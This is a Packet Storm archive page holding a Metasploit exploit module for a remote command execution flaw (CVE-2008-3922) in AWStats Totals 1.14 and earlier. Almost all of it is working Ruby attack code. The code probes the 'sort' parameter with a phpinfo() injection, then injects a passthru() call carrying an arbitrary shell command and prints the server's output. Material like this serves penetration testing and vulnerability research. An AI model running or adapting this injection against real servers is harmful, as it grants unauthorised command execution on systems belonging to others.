Lucene search

K
packetstormPatrick WebsterPACKETSTORM:101698
HistoryMay 26, 2011 - 12:00 a.m.

AWStats Totals 1.14 Remote Command Execution

2011-05-2600:00:00
Patrick Webster
packetstormsecurity.com
19

0.962 High

EPSS

Percentile

99.5%

`##  
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution',  
'Description' => %q{  
This module exploits an arbitrary command execution vulnerability in the  
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12715 $',  
'References' =>  
[  
['CVE', '2008-3922'],  
['OSVDB', '47807'],  
['BID', '30856'],  
['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 512,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Aug 26 2008',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'uri' => datastore['URI'],  
'vars_get' =>  
{  
'sort' => '"].phpinfo().exit().$a["'  
}  
}, 25)  
  
if (res and res.body.match(/localhost/))  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
command = Rex::Text.uri_encode(payload.encoded)  
sploit = datastore['URI'] + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'  
  
res = send_request_raw({  
'uri' => sploit,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
  
m = res.body.match(/YYY\n(.*)\nYYY/m)  
  
if (m)  
print_status("Command output from the server:")  
print("\n" + m[1] + "\n\n")  
else  
print_status("This server may not be vulnerable")  
end  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`

0.962 High

EPSS

Percentile

99.5%